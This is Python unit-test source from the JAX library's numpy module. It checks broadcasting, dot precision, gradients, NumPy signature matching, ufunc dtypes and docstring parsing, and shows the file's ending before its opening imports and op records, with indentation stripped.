jnp.ones(2) + jnp.ones((1, 2)) # works just fine
with jax.numpy_rank_promotion("raise"):
self.assertRaises(ValueError, lambda: jnp.ones(2) + jnp.ones((1, 2)))
with jax.numpy_rank_promotion("warn"):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
jnp.ones(2) + jnp.ones((1, 2))
assert len(w) > 0
msg = str(w[-1].message)
expected_msg = ("Following NumPy automatic rank promotion for add on "
"shapes (2,) (1, 2).")
self.assertEqual(msg[:len(expected_msg)], expected_msg)
prev_len = len(w)
jnp.ones(2) + 3
self.assertEqual(len(w), prev_len) # don't want to warn for scalars
def testStackArrayArgument(self):
# tests https://github.com/google/jax/issues/1271
@api.jit
def foo(x):
return jnp.stack(x)
foo(np.zeros(2)) # doesn't crash
@api.jit
def foo(x):
return jnp.concatenate(x)
foo(np.zeros((2, 2))) # doesn't crash
def testReluGradientConstants(self):
# This is a regression test that verifies that constants associated with the
# gradient of np.maximum (from lax._balanced_eq) aren't hoisted into the
# outermost jaxpr. This was producing some large materialized constants for
# every relu activation in a model.
def body(i, xy):
x, y = xy
y = y + jax.grad(lambda z: jnp.sum(jnp.maximum(z, 0.)))(x)
return x, y
f = lambda y: lax.fori_loop(0, 5, body, (y, y))
jaxpr = jax.make_jaxpr(f)(np.zeros((3, 4), np.float32))
self.assertFalse(
any(np.array_equal(x, np.full((3, 4), 2., dtype=np.float32))
for x in jaxpr.consts))
@parameterized.named_parameters(
{"testcase_name": "_from={}_to={}".format(from_shape, to_shape),
"from_shape": from_shape, "to_shape": to_shape}
for from_shape, to_shape in [
[(1, 3), (4, 3)],
[(3,), (2, 1, 3)],
[(3,), (3, 3)],
[(1,), (3,)],
[(1,), 3],
])
def testBroadcastTo(self, from_shape, to_shape):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [from_shape], [np.float32])
np_op = lambda x: np.broadcast_to(x, to_shape)
jnp_op = lambda x: jnp.broadcast_to(x, to_shape)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(
{"testcase_name": f"_{shapes}", "shapes": shapes, "broadcasted_shape": broadcasted_shape}
for shapes, broadcasted_shape in [
[[], ()],
[[()], ()],
[[(1, 3), (4, 3)], (4, 3)],
[[(3,), (2, 1, 3)], (2, 1, 3)],
[[(3,), (3, 3)], (3, 3)],
[[(1,), (3,)], (3,)],
[[(1,), 3], (3,)],
[[(6, 7), (5, 6, 1), (7,), (5, 1, 7)], (5, 6, 7)],
[[[1], [0, 1]], (0, 1)],
[[(1,), np.array([0, 1])], (0, 1)],
])
def testBroadcastShapes(self, shapes, broadcasted_shape):
# Test against np.broadcast_shapes once numpy 1.20 is minimum required version
np.testing.assert_equal(jnp.broadcast_shapes(*shapes), broadcasted_shape)
def testBroadcastToIssue1522(self):
self.assertRaisesRegex(
ValueError, "Incompatible shapes for broadcasting: .*",
lambda: jnp.broadcast_to(np.ones((2, 3)), (1, 3)))
def testBroadcastToIntIssue1548(self):
self.assertAllClose(jnp.broadcast_to(1, (3, 2)), np.ones((3, 2)),
check_dtypes=False)
def testBroadcastToOnScalar(self):
self.assertIsInstance(jnp.broadcast_to(10.0, ()), jnp.ndarray)
self.assertIsInstance(np.broadcast_to(10.0, ()), np.ndarray)
def testPrecision(self):
ones_1d = np.ones((2,))
ones_2d = np.ones((2, 2))
ones_3d = np.ones((2, 2, 2))
HIGHEST = lax.Precision.HIGHEST
jtu.assert_dot_precision(None, jnp.dot, ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.dot, precision=HIGHEST),
ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.dot, precision=HIGHEST),
ones_3d, ones_3d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.matmul, precision=HIGHEST),
ones_2d, ones_2d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.vdot, precision=HIGHEST),
ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.tensordot, axes=2, precision=HIGHEST),
ones_2d, ones_2d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.tensordot, axes=(0, 0), precision=HIGHEST),
ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.tensordot, axes=((0,), (0,)), precision=HIGHEST),
ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.einsum, 'i,i', precision=HIGHEST),
ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.einsum, 'ij,ij', precision=HIGHEST),
ones_2d, ones_2d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.inner, precision=HIGHEST),
ones_1d, ones_1d)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": "_shape={}_varargs={} axis={}_dtype={}".format(
shape, varargs, axis, dtype),
"shape": shape, "varargs": varargs, "axis": axis, "dtype": dtype}
for shape in [(10,), (10, 15), (10, 15, 20)]
for _num_axes in range(len(shape))
for varargs in itertools.combinations(range(1, len(shape) + 1), _num_axes)
for axis in itertools.combinations(range(len(shape)), _num_axes)
for dtype in inexact_dtypes))
def testGradient(self, shape, varargs, axis, dtype):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
jnp_fun = lambda y: jnp.gradient(y, *varargs, axis=axis)
np_fun = lambda y: np.gradient(y, *varargs, axis=axis)
self._CheckAgainstNumpy(
np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
def testZerosShapeErrors(self):
# see https://github.com/google/jax/issues/1822
self.assertRaisesRegex(
TypeError,
"Shapes must be 1D sequences of concrete values of integer type.*",
lambda: jnp.zeros(1.))
self.assertRaisesRegex(
TypeError,
r"Shapes must be 1D sequences of concrete values of integer type.*\n"
"If using `jit`, try using `static_argnums` or applying `jit` to smaller subfunctions.",
lambda: api.jit(jnp.zeros)(2))
def testTraceMethod(self):
x = self.rng().randn(3, 4).astype(jnp.float_)
self.assertAllClose(x.trace(), jnp.array(x).trace())
self.assertAllClose(x.trace(), api.jit(lambda y: y.trace())(x))
def testIntegerPowersArePrecise(self):
# See https://github.com/google/jax/pull/3036
# Checks if the squares of float32 integers have no numerical errors.
# It should be satisfied with all integers less than sqrt(2**24).
x = jnp.arange(-2**12, 2**12, dtype=jnp.int32)
np.testing.assert_array_equal(jnp.square(x.astype(jnp.float32)), x * x)
np.testing.assert_array_equal(x.astype(jnp.float32) ** 2, x * x)
# Similarly for cubes.
x = jnp.arange(-2**8, 2**8, dtype=jnp.int32)
np.testing.assert_array_equal(x.astype(jnp.float32) ** 3, x * x * x)
x = np.arange(10, dtype=np.float32)
for i in range(10):
self.assertAllClose(x.astype(jnp.float32) ** i, x ** i,
check_dtypes=False)
def testToBytes(self):
v = np.arange(12, dtype=np.int32).reshape(3, 4)
for order in ['C', 'F']:
self.assertEqual(jnp.asarray(v).tobytes(order), v.tobytes(order))
def testToList(self):
v = np.arange(12, dtype=np.int32).reshape(3, 4)
self.assertEqual(jnp.asarray(v).tolist(), v.tolist())
def testReductionWithRepeatedAxisError(self):
with self.assertRaisesRegex(ValueError, r"duplicate value in 'axis': \(0, 0\)"):
jnp.sum(jnp.arange(3), (0, 0))
def testArangeConcretizationError(self):
msg = r"It arose in jax.numpy.arange argument `{}`".format
with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg('stop')):
jax.jit(jnp.arange)(3)
with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg('start')):
jax.jit(lambda start: jnp.arange(start, 3))(0)
with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg('stop')):
jax.jit(lambda stop: jnp.arange(0, stop))(3)
def testIssue2347(self):
# https://github.com/google/jax/issues/2347
object_list = List[Tuple[jnp.array, float, float, jnp.array, bool]]
self.assertRaises(TypeError, jnp.array, object_list)
np_object_list = np.array(object_list)
self.assertRaises(TypeError, jnp.array, np_object_list)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix("", shapes, dtypes),
"shapes": shapes, "dtypes": dtypes}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(all_shapes, 2))
for dtypes in itertools.product(
*(_valid_dtypes_for_shape(s, complex_dtypes) for s in shapes))))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testLogaddexpComplex(self, shapes, dtypes):
@jtu.ignore_warning(category=RuntimeWarning, message="invalid value.*")
def np_op(x1, x2):
return np.log(np.exp(x1) + np.exp(x2))
rng = jtu.rand_some_nan(self.rng())
args_maker = lambda: tuple(rng(shape, dtype) for shape, dtype in zip(shapes, dtypes))
if jtu.device_under_test() == 'tpu':
tol = {np.complex64: 1e-3, np.complex128: 1e-10}
else:
tol = {np.complex64: 1e-5, np.complex128: 1e-14}
self._CheckAgainstNumpy(_promote_like_jnp(np_op), jnp.logaddexp, args_maker, tol=tol)
self._CompileAndCheck(jnp.logaddexp, args_maker, rtol=tol, atol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix("", shapes, dtypes),
"shapes": shapes, "dtypes": dtypes}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(all_shapes, 2))
for dtypes in itertools.product(
*(_valid_dtypes_for_shape(s, complex_dtypes) for s in shapes))))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testLogaddexp2Complex(self, shapes, dtypes):
@jtu.ignore_warning(category=RuntimeWarning, message="invalid value.*")
def np_op(x1, x2):
return np.log2(np.exp2(x1) + np.exp2(x2))
rng = jtu.rand_some_nan(self.rng())
args_maker = lambda: tuple(rng(shape, dtype) for shape, dtype in zip(shapes, dtypes))
if jtu.device_under_test() == 'tpu':
tol = {np.complex64: 1e-3, np.complex128: 1e-10}
else:
tol = {np.complex64: 1e-5, np.complex128: 1e-14}
self._CheckAgainstNumpy(_promote_like_jnp(np_op), jnp.logaddexp2, args_maker, tol=tol)
self._CompileAndCheck(jnp.logaddexp2, args_maker, rtol=tol, atol=tol)
# Most grad tests are at the lax level (see lax_test.py), but we add some here
# as needed for e.g. particular compound ops of interest.
GradTestSpec = collections.namedtuple(
"GradTestSpec",
["op", "nargs", "order", "rng_factory", "dtypes", "name", "tol"])
def grad_test_spec(op, nargs, order, rng_factory, dtypes, name=None, tol=None):
return GradTestSpec(
op, nargs, order, rng_factory, dtypes, name or op.__name__, tol)
GRAD_TEST_RECORDS = [
grad_test_spec(jnp.arcsinh, nargs=1, order=2,
rng_factory=jtu.rand_positive,
dtypes=[np.float64, np.complex64],
tol={np.complex64: 2e-2}),
grad_test_spec(jnp.arccosh, nargs=1, order=2,
rng_factory=jtu.rand_positive,
dtypes=[np.float64, np.complex64],
tol={np.complex64: 2e-2}),
grad_test_spec(jnp.arctanh, nargs=1, order=2,
rng_factory=partial(jtu.rand_uniform, low=-0.9, high=0.9),
dtypes=[np.float64, np.complex64],
tol={np.complex64: 2e-2}),
grad_test_spec(jnp.logaddexp, nargs=2, order=1,
rng_factory=partial(jtu.rand_uniform, low=-0.9, high=0.9),
dtypes=[np.float64], tol=1e-4),
grad_test_spec(jnp.logaddexp2, nargs=2, order=2,
rng_factory=partial(jtu.rand_uniform, low=-0.9, high=0.9),
dtypes=[np.float64], tol=1e-4),
]
GradSpecialValuesTestSpec = collections.namedtuple(
"GradSpecialValuesTestSpec", ["op", "values", "order"])
GRAD_SPECIAL_VALUE_TEST_RECORDS = [
GradSpecialValuesTestSpec(jnp.arcsinh, [0., 1000.], 2),
GradSpecialValuesTestSpec(jnp.arccosh, [1000.], 2),
GradSpecialValuesTestSpec(jnp.arctanh, [0.], 2),
GradSpecialValuesTestSpec(jnp.sinc, [0.], 1),
]
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpyGradTests(jtu.JaxTestCase):
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(
rec.name, shapes, itertools.repeat(dtype)),
"op": rec.op, "rng_factory": rec.rng_factory, "shapes": shapes, "dtype": dtype,
"order": rec.order, "tol": rec.tol}
for shapes in itertools.combinations_with_replacement(nonempty_shapes, rec.nargs)
for dtype in rec.dtypes)
for rec in GRAD_TEST_RECORDS))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testOpGrad(self, op, rng_factory, shapes, dtype, order, tol):
rng = rng_factory(self.rng())
tol = jtu.join_tolerance(tol, {np.float32: 1e-1, np.float64: 1e-3,
np.complex64: 1e-1, np.complex128: 1e-3})
args = tuple(rng(shape, dtype) for shape in shapes)
check_grads(op, args, order, ["fwd", "rev"], tol, tol)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": "_{}_{}".format(rec.op.__name__, special_value),
"op": rec.op, "special_value": special_value, "order": rec.order}
for special_value in rec.values)
for rec in GRAD_SPECIAL_VALUE_TEST_RECORDS))
def testOpGradSpecialValue(self, op, special_value, order):
check_grads(op, (special_value,), order, ["fwd", "rev"],
atol={np.float32: 3e-3})
def testSincAtZero(self):
# Some manual tests for sinc at zero, since it doesn't have well-behaved
# numerical derivatives at zero
def deriv(f):
return lambda x: api.jvp(f, (x,), (1.,))[1]
def apply_all(fns, x):
for f in fns:
x = f(x)
return x
d1 = 0.
for ops in itertools.combinations_with_replacement([deriv, api.grad], 1):
self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d1)
d2 = -np.pi ** 2 / 3
for ops in itertools.combinations_with_replacement([deriv, api.grad], 2):
self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d2)
d3 = 0.
for ops in itertools.combinations_with_replacement([deriv, api.grad], 3):
self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d3)
d4 = np.pi ** 4 / 5
for ops in itertools.combinations_with_replacement([deriv, api.grad], 4):
self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d4)
def testSincGradArrayInput(self):
# tests for a bug almost introduced in #5077
jax.grad(lambda x: jnp.sinc(x).sum())(jnp.arange(10.)) # doesn't crash
def testTakeAlongAxisIssue1521(self):
# https://github.com/google/jax/issues/1521
idx = jnp.repeat(jnp.arange(3), 10).reshape((30, 1))
def f(x):
y = x * jnp.arange(3.).reshape((1, 3))
return jnp.take_along_axis(y, idx, -1).sum()
check_grads(f, (1.,), order=1)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix("", shapes, itertools.repeat(dtype)),
"shapes": shapes, "dtype": dtype}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(nonempty_shapes, 2))
for dtype in (np.complex128, )))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testGradLogaddexpComplex(self, shapes, dtype):
rng = jtu.rand_default(self.rng())
args = tuple(rng(shape, dtype) for shape in shapes)
if jtu.device_under_test() == "tpu":
tol = 5e-2
else:
tol = 3e-2
check_grads(jnp.logaddexp, args, 1, ["fwd", "rev"], tol, tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix("", shapes, itertools.repeat(dtype)),
"shapes": shapes, "dtype": dtype}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(nonempty_shapes, 2))
for dtype in (np.complex128, )))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testGradLogaddexp2Complex(self, shapes, dtype):
rng = jtu.rand_default(self.rng())
args = tuple(rng(shape, dtype) for shape in shapes)
if jtu.device_under_test() == "tpu":
tol = 5e-2
else:
tol = 3e-2
check_grads(jnp.logaddexp2, args, 1, ["fwd", "rev"], tol, tol)
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpySignaturesTest(jtu.JaxTestCase):
def testWrappedSignaturesMatch(self):
"""Test that jax.numpy function signatures match numpy."""
jnp_funcs = {name: getattr(jnp, name) for name in dir(jnp)}
func_pairs = {name: (fun, fun.__np_wrapped__) for name, fun in jnp_funcs.items()
if hasattr(fun, '__np_wrapped__')}
assert len(func_pairs) > 0
# TODO(jakevdp): fix some of the following signatures. Some are due to wrong argument names.
unsupported_params = {
'angle': ['deg'],
'asarray': ['like'],
'broadcast_to': ['subok', 'array'],
'clip': ['kwargs'],
'corrcoef': ['ddof', 'bias', 'dtype'],
'cov': ['dtype'],
'empty_like': ['subok', 'order'],
'einsum': ['kwargs'],
'einsum_path': ['einsum_call'],
'eye': ['order', 'like'],
'identity': ['like'],
'full': ['order', 'like'],
'full_like': ['subok', 'order'],
'histogram': ['normed'],
'histogram2d': ['normed'],
'histogramdd': ['normed'],
'ones': ['order', 'like'],
'ones_like': ['subok', 'order'],
'tri': ['like'],
'unwrap': ['period'],
'zeros_like': ['subok', 'order']
}
extra_params = {
'broadcast_to': ['arr'],
'einsum': ['precision'],
'einsum_path': ['subscripts'],
}
mismatches = {}
for name, (jnp_fun, np_fun) in func_pairs.items():
# broadcast_shapes is not available in numpy < 1.20
if numpy_version < (1, 20) and name == "broadcast_shapes":
continue
# Some signatures have changed; skip for older numpy versions.
if numpy_version < (1, 19) and name in ['einsum_path', 'gradient', 'isscalar']:
continue
# Note: can't use inspect.getfullargspec due to numpy issue
# https://github.com/numpy/numpy/issues/12225
try:
np_params = inspect.signature(np_fun).parameters
except ValueError:
# Some functions cannot be inspected
continue
jnp_params = inspect.signature(jnp_fun).parameters
extra = set(extra_params.get(name, []))
unsupported = set(unsupported_params.get(name, []))
# Checks to prevent tests from becoming out-of-date. If these fail,
# it means that extra_params or unsupported_params need to be updated.
assert extra.issubset(jnp_params), f"{name}: extra={extra} is not a subset of jnp_params={set(jnp_params)}."
assert not unsupported.intersection(jnp_params), f"{name}: unsupported={unsupported} overlaps with jnp_params={set(jnp_params)}."
# Skip functions that only have *args and **kwargs; we can't introspect these further.
var_args = (inspect.Parameter.VAR_POSITIONAL, inspect.Parameter.VAR_KEYWORD)
if all(p.kind in var_args for p in jnp_params.values()):
continue
if all(p.kind in var_args for p in np_params.values()):
continue
# Remove known extra parameters.
jnp_params = {a: p for a, p in jnp_params.items() if a not in extra}
# Remove known unsupported parameters.
np_params = {a: p for a, p in np_params.items() if a not in unsupported}
# Older versions of numpy may have fewer parameters; to avoid extraneous errors on older numpy
# versions, we allow for jnp to have more parameters.
if list(jnp_params)[:len(np_params)] != list(np_params):
mismatches[name] = {'np_params': list(np_params), 'jnp_params': list(jnp_params)}
self.assertEqual(mismatches, {})
_all_dtypes: List[str] = [
"bool_",
"uint8", "uint16", "uint32", "uint64",
"int8", "int16", "int32", "int64",
"float16", "float32", "float64",
"complex64", "complex128",
]
def _all_numpy_ufuncs() -> Iterator[str]:
"""Generate the names of all ufuncs in the top-level numpy namespace."""
for name in dir(np):
f = getattr(np, name)
if isinstance(f, np.ufunc):
yield name
def _dtypes_for_ufunc(name: str) -> Iterator[Tuple[str, ...]]:
"""Generate valid dtypes of inputs to the given numpy ufunc."""
func = getattr(np, name)
for arg_dtypes in itertools.product(_all_dtypes, repeat=func.nin):
args = (np.ones(1, dtype=dtype) for dtype in arg_dtypes)
try:
with warnings.catch_warnings():
warnings.filterwarnings("ignore", "divide by zero", RuntimeWarning)
_ = func(*args)
except TypeError:
pass
else:
yield arg_dtypes
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpyUfuncTests(jtu.JaxTestCase):
@parameterized.named_parameters(
{"testcase_name": f"_{name}_{",".join(arg_dtypes)}",
"name": name, "arg_dtypes": arg_dtypes}
for name in _all_numpy_ufuncs()
for arg_dtypes in jtu.cases_from_list(_dtypes_for_ufunc(name)))
def testUfuncInputTypes(self, name, arg_dtypes):
# TODO(jakevdp): fix following failures and remove from this exception list.
if (name in ['divmod', 'floor_divide', 'fmod', 'gcd', 'left_shift', 'mod',
'power', 'remainder', 'right_shift', 'rint', 'square']
and 'bool_' in arg_dtypes):
self.skipTest(f"jax.numpy does not support {name}{tuple(arg_dtypes)}")
if name == 'arctanh' and jnp.issubdtype(arg_dtypes[0], jnp.complexfloating):
self.skipTest("np.arctanh & jnp.arctanh have mismatched NaNs for complex input.")
for dtype in arg_dtypes:
jtu.skip_if_unsupported_type(dtype)
jnp_op = getattr(jnp, name)
np_op = getattr(np, name)
np_op = jtu.ignore_warning(category=RuntimeWarning,
message="divide by zero.*")(np_op)
args_maker = lambda: tuple(np.ones(1, dtype=dtype) for dtype in arg_dtypes)
try:
jnp_op(*args_maker())
except NotImplementedError:
self.skipTest(f"jtu.{name} is not yet implemented.")
# large tol comes from the fact that numpy returns float16 in places
# that jnp returns float32. e.g. np.cos(np.uint8(0))
self._CheckAgainstNumpy(np_op, jnp_op, args_maker, check_dtypes=False, tol=1E-2)
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpyDocTests(jtu.JaxTestCase):
def test_lax_numpy_docstrings(self):
# Test that docstring wrapping & transformation didn't fail.
# Functions that have their own docstrings & don't wrap numpy.
known_exceptions = {'broadcast_arrays', 'vectorize'}
for name in dir(jnp):
if name in known_exceptions or name.startswith('_'):
continue
# We only check signatures of functions.
obj = getattr(jnp, name)
if isinstance(obj, type) or not callable(obj):
continue
# Some jnp functions are imported from numpy or jax.dtypes directly.
if any(obj is getattr(mod, obj.__name__, None) for mod in [np, dtypes]):
continue
wrapped_fun = obj.__np_wrapped__
# If the wrapped function has a docstring, obj should too
if wrapped_fun.__doc__ and not obj.__doc__:
raise Exception(f"jnp.{name} does not contain wrapped docstring.")
if obj.__doc__ and "*Original docstring below.*" not in obj.__doc__:
raise Exception(f"jnp.{name} does not have a wrapped docstring.")
def test_parse_numpydoc(self):
# Unit test ensuring that _parse_numpydoc correctly parses docstrings for all
# functions in NumPy's top-level namespace.
section_titles = {'Attributes', 'Examples', 'Notes',
'Parameters', 'Raises', 'References',
'Returns', 'See also', 'See Also', 'Warnings', 'Warns'}
headings = [title + '\n' + '-'*len(title) for title in section_titles]
for name in dir(np):
if name.startswith('_'):
continue
obj = getattr(np, name)
if isinstance(obj, type):
continue
if not callable(obj):
continue
if 'built-in function' in repr(obj):
continue
parsed = _parse_numpydoc(obj.__doc__)
# Check that no docstring is handled gracefully.
if not obj.__doc__:
self.assertEqual(parsed, ParsedDoc(obj.__doc__))
continue
# Check that no unexpected section names are found.
extra_keys = parsed.sections.keys() - section_titles
if extra_keys:
raise ValueError(f"Extra section headers found in np.{name}: {extra_keys}")
# Check that every docstring has a summary.
if not parsed.summary:
raise ValueError(f"No summary found for np.{name}")
# Check that no expected headings are missed.
for heading in headings:
assert heading not in parsed.front_matter
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
| # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import functools
from functools import partial
import inspect
import itertools
import operator
from typing import cast, Iterator, Optional, List, Tuple
import unittest
from unittest import SkipTest
import warnings
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
try:
import numpy_dispatch
except ImportError:
numpy_dispatch = None
import jax
import jax.ops
from jax._src import api
from jax import lax
from jax import numpy as jnp
from jax import test_util as jtu
from jax._src import dtypes
from jax import tree_util
from jax.interpreters import xla
from jax.test_util import check_grads
from jax._src.util import prod
from jax._src.numpy.util import _parse_numpydoc, ParsedDoc
from jax.config import config
config.parse_flags_with_absl()
FLAGS = config.FLAGS
numpy_version = tuple(map(int, np.__version__.split('.')[:3]))
nonempty_nonscalar_array_shapes = [(4,), (3, 4), (3, 1), (1, 4), (2, 1, 4), (2, 3, 4)]
nonempty_array_shapes = [()] + nonempty_nonscalar_array_shapes
one_dim_array_shapes = [(1,), (6,), (12,)]
empty_array_shapes = [(0,), (0, 4), (3, 0),]
scalar_shapes = [jtu.NUMPY_SCALAR_SHAPE, jtu.PYTHON_SCALAR_SHAPE]
array_shapes = nonempty_array_shapes + empty_array_shapes
nonzerodim_shapes = nonempty_nonscalar_array_shapes + empty_array_shapes
nonempty_shapes = scalar_shapes + nonempty_array_shapes
all_shapes = scalar_shapes + array_shapes
float_dtypes = jtu.dtypes.all_floating
complex_dtypes = jtu.dtypes.complex
int_dtypes = jtu.dtypes.all_integer
unsigned_dtypes = jtu.dtypes.all_unsigned
bool_dtypes = jtu.dtypes.boolean
default_dtypes = float_dtypes + int_dtypes
inexact_dtypes = float_dtypes + complex_dtypes
number_dtypes = float_dtypes + complex_dtypes + int_dtypes
all_dtypes = number_dtypes + bool_dtypes
python_scalar_dtypes = [jnp.bool_, jnp.int_, jnp.float_, jnp.complex_]
# uint64 is problematic because with any uint type it promotes to float:
int_dtypes_no_uint64 = [d for d in int_dtypes + unsigned_dtypes if d != np.uint64]
def _valid_dtypes_for_shape(shape, dtypes):
# Not all (shape, dtype) pairs are valid. In particular, Python scalars only
# have one type in each category (float, bool, etc.)
if shape is jtu.PYTHON_SCALAR_SHAPE:
return [t for t in dtypes if t in python_scalar_dtypes]
return dtypes
def _shape_and_dtypes(shapes, dtypes):
for shape in shapes:
for dtype in _valid_dtypes_for_shape(shape, dtypes):
yield (shape, dtype)
def _compatible_shapes(shape):
if shape in scalar_shapes or np.ndim(shape) == 0:
return [shape]
return (shape[n:] for n in range(len(shape) + 1))
def _get_y_shapes(y_dtype, shape, rowvar):
# Helper function for testCov.
if y_dtype is None:
return [None]
if len(shape) == 1:
return [shape]
elif rowvar or shape[0] == 1:
return [(1, shape[-1]), (2, shape[-1]), (5, shape[-1])]
return [(shape[0], 1), (shape[0], 2), (shape[0], 5)]
OpRecord = collections.namedtuple(
"OpRecord",
["name", "nargs", "dtypes", "shapes", "rng_factory", "diff_modes",
"test_name", "check_dtypes", "tolerance", "inexact"])
def op_record(name, nargs, dtypes, shapes, rng_factory, diff_modes,
test_name=None, check_dtypes=True,
tolerance=None, inexact=False):
test_name = test_name or name
return OpRecord(name, nargs, dtypes, shapes, rng_factory, diff_modes,
test_name, check_dtypes, tolerance, inexact)
JAX_ONE_TO_ONE_OP_RECORDS = [
op_record("abs", 1, number_dtypes + unsigned_dtypes + bool_dtypes,
all_shapes, jtu.rand_default, ["rev"]),
op_record("add", 2, all_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("ceil", 1, float_dtypes, all_shapes, jtu.rand_default, []),
op_record("ceil", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_default, [], check_dtypes=False),
op_record("conj", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
op_record("exp", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
inexact=True),
op_record("fabs", 1, float_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("float_power", 2, inexact_dtypes, all_shapes,
partial(jtu.rand_default, scale=1), ["rev"],
tolerance={jnp.bfloat16: 1e-2, np.float32: 1e-3,
np.float64: 1e-12, np.complex64: 2e-4,
np.complex128: 1e-12}, check_dtypes=False),
op_record("floor", 1, float_dtypes, all_shapes, jtu.rand_default, []),
op_record("floor", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_default, [], check_dtypes=False),
op_record("greater", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
op_record("greater_equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
op_record("i0", 1, float_dtypes, all_shapes, jtu.rand_default, [],
check_dtypes=False),
op_record("ldexp", 2, int_dtypes, all_shapes, jtu.rand_default, [], check_dtypes=False),
op_record("less", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
op_record("less_equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
op_record("log", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
inexact=True),
op_record("logical_and", 2, all_dtypes, all_shapes, jtu.rand_bool, []),
op_record("logical_not", 1, all_dtypes, all_shapes, jtu.rand_bool, []),
op_record("logical_or", 2, all_dtypes, all_shapes, jtu.rand_bool, []),
op_record("logical_xor", 2, all_dtypes, all_shapes, jtu.rand_bool, []),
op_record("maximum", 2, all_dtypes, all_shapes, jtu.rand_some_inf, []),
op_record("minimum", 2, all_dtypes, all_shapes, jtu.rand_some_inf, []),
op_record("multiply", 2, all_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("negative", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("nextafter", 2, [f for f in float_dtypes if f != jnp.bfloat16],
all_shapes, jtu.rand_default, ["rev"], inexact=True, tolerance=0),
op_record("not_equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, ["rev"]),
op_record("array_equal", 2, number_dtypes, all_shapes, jtu.rand_some_equal, ["rev"]),
op_record("array_equiv", 2, number_dtypes, all_shapes, jtu.rand_some_equal, ["rev"]),
op_record("reciprocal", 1, inexact_dtypes, all_shapes, jtu.rand_default, []),
op_record("subtract", 2, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("signbit", 1, default_dtypes + bool_dtypes, all_shapes,
jtu.rand_some_inf_and_nan, ["rev"]),
op_record("trunc", 1, float_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
op_record("trunc", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_some_inf_and_nan, [], check_dtypes=False),
op_record("sin", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
inexact=True),
